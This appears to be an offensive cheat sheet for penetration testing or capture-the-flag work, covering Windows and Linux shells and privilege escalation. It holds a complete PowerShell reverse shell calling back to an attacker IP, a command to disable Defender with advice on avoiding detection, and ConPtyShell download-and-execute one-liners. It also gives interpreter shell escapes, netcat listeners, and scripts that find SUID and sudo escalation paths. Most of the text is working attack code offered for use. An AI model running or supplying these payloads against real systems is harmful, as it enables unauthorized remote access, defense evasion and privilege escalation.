๐ŸšShells & Payloads


Powershell

Code (PowerShell)

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
  • 10.10.14.158 and 443 are the attacker's listener IP and port; catch it with nc -lvnp 443 on that host. The loop reads one line, runs it with iex, and writes stdout plus stderr (2>&1) back behind a fake "PS <path>> " prompt. There is no real console behind it, so interactive programs, Ctrl-C and tab completion do not work; use ConPtyShell below when a full terminal is needed.

Disable AV

Code

Set-MpPreference -DisableRealtimeMonitoring $true
  • Needs an elevated (Administrator) PowerShell. With Tamper Protection enabled, which is the default on current Windows 10/11 builds, Defender rejects the change, and the attempt itself is a high-signal event for defenders, so prefer an exclusion or a payload that does not trip real-time scanning when staying quiet matters.

ConPtyShell - Windows System


code (client side)

IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.0.0.2 3001
powershell IEX(IWR https://10.10.14.8/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.10.14.8 9001
  • The first line is the project README's example (listener 10.0.0.2:3001); the second is run from cmd.exe and pulls the script from your own web server on 10.10.14.8 to match the 9001 listener below. If that server uses a self-signed certificate, Windows PowerShell 5.1's IWR refuses it: serve the script over plain HTTP or use -SkipCertificateCheck on PowerShell 7. ConPtyShell needs the ConPTY API, i.e. Windows 10 / Server 2019 version 1809 or later, for a real pseudo-console.


code (server side)

stty raw -echo; (stty size; cat) | nc -lvnp 9001
  • Start this before triggering the client. stty raw -echo hands every keystroke, Ctrl-C included, to the remote side; (stty size; cat) sends your terminal's rows and columns as the first line so ConPtyShell can size the pseudo-console, then pipes your keystrokes through. When the session ends, the local terminal is still in raw mode: type reset (blind) to recover it.


TTY SHELL - SPAWNING INTERACTIVE SHELL

Interactive Python (TTY Shell)

Code

python -c 'import pty; pty.spawn("/bin/sh")'
  • Use python3 when python is not on PATH. The spawned shell has a real pty, so su/sudo password prompts, clear and editors work. To make it fully usable, background it with Ctrl-Z, run stty raw -echo; fg on the attacker side, then set stty rows <n> cols <m> and export TERM=xterm in the remote shell.

/bin/sh -i

Code

/bin/sh -i
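Both the ConPtyShell listener above and the pty-spawning shells in this section leave the attacker's terminal in raw mode and need the terminal size passed to the remote side. The script below is an added example, not code from the page or from the ConPtyShell project: it wraps the listener so the local tty is always restored, and builds the stty/TERM line to paste into a plain pty shell. The 9001 default port and TERM=xterm are assumptions.

```shell
#!/bin/sh
# Added example, not part of the original page: listener wrapper for the
# raw-tty catch used with ConPtyShell ("stty raw -echo; (stty size; cat) |
# nc -lvnp 9001") and for plain pty shells (python -c 'import pty; ...').
# It snapshots the local terminal state, restores it however nc ends, and
# prints the fix-up line that gives a plain pty shell the right size.

# fixup_cmd ROWS COLS -> line to paste into the remote pty shell after "fg".
fixup_cmd() {
    printf 'stty rows %s cols %s; export TERM=xterm\n' "$1" "$2"
}

# fixup_from_size "ROWS COLS" -> same, straight from "stty size" output.
fixup_from_size() {
    set -- $1                      # intentional word split of "ROWS COLS"
    fixup_cmd "$1" "$2"
}

# raw_listen CMD... : put the local terminal in raw mode (Ctrl-C, Ctrl-Z, tab
# and arrow keys then reach the remote pty instead of the local shell), run
# CMD, and put the terminal back even if CMD is killed. A bare "stty raw -echo"
# otherwise leaves a dead-looking terminal when the connection drops.
raw_listen() {
    saved=$(stty -g)               # portable snapshot of all tty settings
    trap 'stty "$saved"' EXIT INT TERM
    stty raw -echo
    "$@"
    stty "$saved"                  # normal exit path
    trap - EXIT INT TERM
}

# catch_pty PORT: for python/perl/ruby pty shells. Paste the printed line into
# the remote shell once it lands, then use it like a local terminal.
catch_pty() {
    printf 'paste into the remote shell: %s\n' "$(fixup_from_size "$(stty size)")"
    raw_listen nc -lvnp "${1:-9001}"
}

# catch_conpty PORT: for Invoke-ConPtyShell, which reads "ROWS COLS" as its
# first input line and sizes the Windows pseudo-console itself.
catch_conpty() {
    raw_listen sh -c '(stty size; cat) | nc -lvnp "$1"' _ "${1:-9001}"
}

# Usage: . ./catch.sh; catch_pty 9001    or    catch_conpty 9001
```

Source the file rather than executing it so the functions land in your interactive shell; catch_pty is the one to use with the Linux escapes in this section, catch_conpty with the Windows client above.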

Perl To Shell

Code

perl -e 'exec "/bin/sh";'

Code (Run from a script)

perl: exec "/bin/sh";

Ruby To Shell

Code (Run from a script)

ruby: exec "/bin/sh"

Lua To Shell

Code (Run from a script)

lua: os.execute('/bin/sh')

AWK To Shell

Code

awk 'BEGIN {system("/bin/sh")}'

Using Find For A Shell

Code

find / -name nameoffile -exec /bin/awk 'BEGIN {system("/bin/sh")}' \;
  • This use of find searches for files whose name matches the -name argument and, for each match, runs /bin/awk with the same BEGIN{system("/bin/sh")} script from the awk section. A shell is spawned once per matching file and not at all if nothing matches, so pick a name that exists.

Using Exec To Launch A Shell

Code

find . -exec /bin/sh \; -quit
  • Here find is given no name test, so the first entry it visits (the current directory itself) matches and -exec launches /bin/sh directly. -quit stops find as soon as that shell exits with status 0, instead of spawning a fresh shell for every entry under "."; if the shell exits non-zero, -quit is not reached and the next entry starts another one. When find itself is the privileged binary (sudo or SUID), the spawned shell inherits its privileges, though bash drops a setuid euid unless started with -p.
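The difference between the two find forms is easy to state and easy to get wrong in a live session, so the script below, an added example rather than code from the page, measures it on a constructed directory instead of spawning real shells: it counts how many times find runs the -exec command depending on that command's exit status (the -quit case) and on whether a -name test matches (the "find / -name nameoffile" case). All paths are temporary files created by the script.

```shell
#!/bin/sh
# Added example (not code from the original page): find evaluates
# "-exec CMD \; -quit" left to right as an AND, so -quit only fires when CMD
# exited 0. A shell you leave with a non-zero status makes find move on and run
# CMD again for the next entry. The functions below count -exec runs over a
# constructed directory so the behaviour can be checked without real shells.

# exec_runs DIR EXIT_CODE -> number of times find ran the -exec command under
# DIR when that command exits with EXIT_CODE (mirrors "find . -exec ... -quit").
exec_runs() {
    log=$(mktemp)
    # Inner sh gets the log path as $1 and the exit code as $2.
    find "$1" -exec sh -c 'echo run >> "$1"; exit "$2"' _ "$log" "$2" \; -quit
    wc -l < "$log" | tr -d ' '
    rm -f "$log"
}

# named_exec_runs DIR NAME -> -exec runs restricted by -name, as in
# "find / -name nameoffile -exec ... \;": no matching file, no shell.
named_exec_runs() {
    log=$(mktemp)
    find "$1" -name "$2" -exec sh -c 'echo run >> "$1"' _ "$log" \;
    wc -l < "$log" | tr -d ' '
    rm -f "$log"
}

# make_sample_tree -> path of a constructed directory holding three files
# (the directory entry itself plus the three files are what find visits).
make_sample_tree() {
    d=$(mktemp -d)
    : > "$d/a.txt"
    : > "$d/b.txt"
    : > "$d/nameoffile"
    printf '%s\n' "$d"
}

# Usage:
#   d=$(make_sample_tree)
#   exec_runs "$d" 0          # 1: -quit fires after the first successful run
#   exec_runs "$d" 1          # 4: -quit never reached, one run per entry
#   named_exec_runs "$d" nameoffile   # 1
#   named_exec_runs "$d" missing      # 0
#   rm -rf "$d"
```

In a real escape the practical consequence is the one in the bullet above: exit the first shell with a plain exit (status 0) and find stops; exit it with Ctrl-D after a failed command and you will drop into a second shell rather than back to your original prompt.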

Vim To Shell

Code

vim -c ':!/bin/sh'

Vim Escape

Code

vim
:set shell=/bin/sh
:shell

Execution Permissions

Permission

Code

ls -la <path/to/fileorbinary>
  • An s in the owner execute slot of the mode column (for example -rwsr-xr-x root root) marks a SUID binary: it runs with its owner's privileges, so a SUID copy of any interpreter above yields a shell as that owner. Check them in one go with ls -la $(command -v python python3 perl ruby lua awk find vim).

Sudo -l

Code

sudo -l
  • Lists the commands the current user may run through sudo and as whom. Entries tagged NOPASSWD need no password, (ALL) ALL means any command, and a rule that lists arguments only allows exactly those arguments. Any of the interpreters from this page appearing here gives a root shell via sudo <command> plus the matching escape above.
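Putting the two permission checks together, the script below is an added example (not from the original page) that turns ls -la and sudo -l into a yes/no list of which interpreters from this page can actually be used for an escape on the current host: it flags SUID copies on PATH and parses sudo -l output for rules naming them. The sudo -l text embedded in it is constructed sample output, not captured from a real host; the candidate list is the set of tools covered above.

```shell
#!/bin/sh
# Added example (not from the original page): check which of the interpreters
# listed above can be used for a shell escape here, via the SUID bit or a sudo
# rule. SAMPLE_SUDO_L is constructed sample text for offline testing.

# Tools from this page that exec /bin/sh once you control their input.
ESCAPE_CANDIDATES="python python3 perl ruby lua awk find vim"

# is_suid PATH -> exit 0 when PATH is a regular file with the setuid bit set
# (the "s" in the owner execute slot of "ls -la", e.g. -rwsr-xr-x).
is_suid() {
    [ -f "$1" ] && [ -u "$1" ]
}

# suid_candidates -> every candidate found on PATH, tagged SUID or no-suid.
# A SUID-root interpreter gives an euid-0 shell directly; start bash with -p
# (or use dash) so the shell keeps that euid instead of dropping it.
suid_candidates() {
    for name in $ESCAPE_CANDIDATES; do
        path=$(command -v "$name" 2>/dev/null) || continue
        if is_suid "$path"; then
            printf '%s SUID\n' "$path"
        else
            printf '%s no-suid\n' "$path"
        fi
    done
}

# parse_sudo_l (sudo -l output on stdin) -> "NOPASSWD|PASSWD <command...>"
# per rule, e.g. "(root) NOPASSWD: /usr/bin/find" -> "NOPASSWD /usr/bin/find".
# Only lines starting with a "(runas)" spec are rules; the rest is skipped.
parse_sudo_l() {
    sed -n 's/^[[:space:]]*([^)]*)[[:space:]]*//p' | while IFS= read -r entry; do
        case $entry in
            NOPASSWD:*) rest=$(printf '%s' "${entry#NOPASSWD:}" | sed 's/^[[:space:]]*//')
                        printf 'NOPASSWD %s\n' "$rest" ;;
            *)          printf 'PASSWD %s\n' "$entry" ;;
        esac
    done
}

# sudo_escape_candidates (sudo -l output on stdin) -> the rules whose command
# is one of ESCAPE_CANDIDATES, or ALL. Rules are printed with their arguments
# because a rule that pins arguments is not a free escape: sudo then requires
# exactly those arguments.
sudo_escape_candidates() {
    parse_sudo_l | while read -r mode cmd; do
        if [ "$cmd" = "ALL" ]; then
            printf '%s ALL (any command)\n' "$mode"
            continue
        fi
        first=${cmd%% *}           # command path without its arguments
        base=${first##*/}          # basename of that path
        for name in $ESCAPE_CANDIDATES; do
            [ "$base" = "$name" ] && printf '%s %s\n' "$mode" "$cmd"
        done
    done
}

# Constructed sample of "sudo -l" output for a low-privilege web user.
SAMPLE_SUDO_L='Matching Defaults entries for www-data on target:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on target:
    (root) NOPASSWD: /usr/bin/find
    (ALL) /usr/bin/vim /etc/hosts
    (root) NOPASSWD: /usr/bin/systemctl status apache2'

# Usage on a real host:
#   suid_candidates
#   sudo -l 2>/dev/null | sudo_escape_candidates
# Offline, against the sample:
#   printf '%s\n' "$SAMPLE_SUDO_L" | sudo_escape_candidates
```

On the sample, find comes back as NOPASSWD and vim as a password-required rule with a pinned argument; systemctl is not a candidate on this page and is dropped. The vim line is still worth a look in practice, since editing /etc/hosts under sudo gets you :set shell=/bin/sh followed by :shell from the Vim Escape section.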
